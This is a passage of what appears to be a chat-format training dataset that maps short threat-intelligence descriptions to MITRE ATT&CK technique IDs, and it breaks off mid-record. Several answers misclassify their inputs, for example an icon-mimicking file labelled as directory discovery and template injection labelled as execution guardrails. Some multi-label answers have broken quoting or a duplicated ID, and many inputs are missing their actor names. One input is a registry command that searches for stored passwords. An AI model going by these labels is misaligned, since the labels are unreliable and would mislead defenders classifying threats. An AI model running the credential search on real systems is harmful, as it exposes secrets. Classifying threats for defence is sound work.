[ { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Dust Storm, the threat actors established domains as part of their operational infrastructure." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "reg query HKLM /f password /t REG_SZ /s" }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Although the developers attempt to use a denylist of files and directories to skip, it was observed encrypting core Windows operating system files, which caused the operating system to become unstable and crash. This was observed when running the ransomware on a Windows 2012 machine" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WIRTE has obtained and used Empire for post-exploitation activities." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy uses cmd.exe to execute commands on the system." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT can browse file systems using a file manager module." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HIDEDRV is a rootkit that hides certain operating system artifacts." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has gathered information about local network connections using ." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Deep Panda has updated and modified its malware, resulting in different hash values that evade detection." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The impact of finding this implant on your network is severe and most likely indicates the presence of other footholds or compromised systems. This backdoor provides ample capability for the attacker to propagate and compromise other hosts and critical data using this as a very stealthy beachhead" }, { "role": "assistant", "content": "T1556.004 - Network Device Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carberp has connected to C2 servers via HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS." }, { "role": "assistant", "content": "T1018 - Remote System Discovery', 'T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first stage implant that is nested in the DOTM file, is using triple base64 encoding in the Visual Basic Macro - The extracted DLL (desktop.dat) is packed with the Themida packer attempting to make analysis more difficult" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Filename Part-I.doc File Size 11349102 bytes MD5 92942c54224cd462dd201ae11a560bb8 SHA1 85a21624df2211af3daf05c86a3fbea8271059d3 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Here, we show an example of a PDF campaign as seen from the point of view of the affected user. This malicious PDF only contains a URL to entice the user to view the file. If the user chooses to click on the URL link and to read the actual content of the file, the browser will open a legitimate Google location which will redirect the browser to a malicious document. Browser redirection Finally, the malicious Word document is opened and the VBA macro code is run after the user allows for the editing of the content within Word. This eventually kickstarts the rest of the infection chain, terminates the Word process to hide the original file and opens a new Word instance to display a non-malicious decoy document dropped to the disk drive by one of the previous stages. Malicious Word document The decoy document remains constant throughout the campaign and is likely a side effect of the Threadkit exploit toolkit and cannot be relied upon for attribution. Decoy document opened in Word" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot has retrieved PuTTY credentials by querying the \"Software\\SimonTatham\\Putty\\Sessions\" registry key" }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered." }, { "role": "assistant", "content": "T1587.003 - Digital Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\\Users\\<Redacted Username>\\Desktop\\OWAExchange" }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has exfiltrated stolen victim data through C2 communications." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It mimics the icon Finder usually applies to JPEG or text files to increase the likelihood the recipient will double-click the file" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors have been known to copy files to the network shares of other computers to move laterally." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proxysvc uses HTTP over SSL to communicate commands with the control server." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used Putty to access compromised systems." }, { "role": "assistant", "content": "T1021 - Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT supports file encryption (AES with the key \"lolomycin2017\")." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony can download additional files onto the infected system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has the ability to download files from the infected host to the command and control (C2) server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors operate a Kubernetes cluster, which allows them to conduct distributed and large-scale targeting using password spray and password guessing" }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of performing keylogging." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Regarding to downloading and executing a tool, Flagpro stores the downloaded file in file path “%Temp%\\~MY[0-9A-F].tmp” first. Then, Flagpro adds extension “.exe” to the name of stored file and executes the file" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses reg add to add a Registry Run key for persistence." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has sent spearphishing attachments attempting to get a user to open them." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has deleted arbitrary Registry values." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cryptoistic can engage in encrypted communications with C2." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Python/TeleBot malware uses exactly the same approach; the Python backdoor code is obfuscated and packed into a standalone executable using PyInstaller. In addition, the Python code is ROT13 encoded, AES encrypted, compressed using zlib library and then Base64 encoded" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has enumerated the host machine’s IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611)." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dyre has a command to download and executes additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crutch can monitor for removable drives being plugged into the compromised machine." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command Functionality Init Create a reverse shell Write Write a file to the compromised system from the C2 server List List the files in a directory Upload Upload a file from the compromised system to the C2 server Table 2" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can write and execute PowerShell scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Destover-like variant used by uses a batch file mechanism to delete its binaries from the system." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET identifies the macOS version and uses \"ioreg\" to determine serial number." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER can use base64 encoded C2 communications." }, { "role": "assistant", "content": "T1001 - Data Obfuscation', 'T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerDuke has commands to get the time the machine was built, the time, and the time zone." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel can upload files from a compromised host over its C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can exfiltrate collected documents through C2 channels." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro can check the name of the window displayed on the system." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using: cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL All the following capabilities described are implemented by the malicious service DLL implant unless specified.   Variant using North Korean Red Cross Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The crimeware toolkit has refined its detection of sandbox analysis environments by inspecting the process list and Registry." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Keydnap uses the keychaindump project to read securityd memory." }, { "role": "assistant", "content": "T1555.002 - Securityd Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\"." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel has used a keylogger." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "stages collected data in a text file." }, { "role": "assistant", "content": "T1074 - Data Staged', 'T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks . Get Free Account . Join Now . Introduction . TeamTNT is a cybercrime group that targets cloud environments including Docker and Kubernetes instances. TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims’ servers. The uniqueness of the recent attack observed by Intezer is the group abuses a legitimate open source tool called Weave Scope to gain full control over the victim’s cloud infrastructure. By installing a legitimate tool such as Weave Scope the attackers reap all the benefits as if they had installed a backdoor on the server, with significantly less effort and without needing to use malware. To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. Once installed, the attackers can connect to the Weave Scope dashboard via HTTP on port 4040 and gain full visibility and control over the victim’s infrastructure. To protect yourself from this attack we recommend to: - Close exposed Docker API ports: This attack takes advantage of a common misconfiguration of the Docker API which gives the attacker full control over the Docker service. Therefore, Docker API ports should be closed or contain restricted access policies in the firewall. Block incoming connections to port 4040: Weave Scope uses default port 4040 to make the dashboard accessible and anyone with access to the network can view the dashboard. Update from Weave Works . Weave Works has since provided this in-depth article on how to prevent malicious attacks using Weave Scope" }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060" }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 has used various open-source tools for privilege escalation purposes." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist can collect the username on a targeted system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "text= from= ai= ags= oe= aq= btnG= oprnd= ai= utm= channel= The page address in the domain of the command and control server is chosen randomly from the list" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some additional log file analysis reveals that a dotm file hosted with a. jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Based on the analysis of the user-agent string belonging to the Israel IP address Microsoft+Office+Existence+Discovery indicates that the dotm file in question was downloaded from within Microsoft Office (template injection" }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBAT has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can register a device to Azure AD." }, { "role": "assistant", "content": "T1098.005 - Device Registration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts" }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used direct Windows system calls by leveraging Dumpert." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command & Control The malware communicates with the Naver email platform in order to communicate with the operator" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used tmp files to stage gathered information." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 continued distributing Dridex through early June 2017 using a range of email attachments. Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used the RAT, which communicates over HTTP with a payload encrypted with RC4." }, { 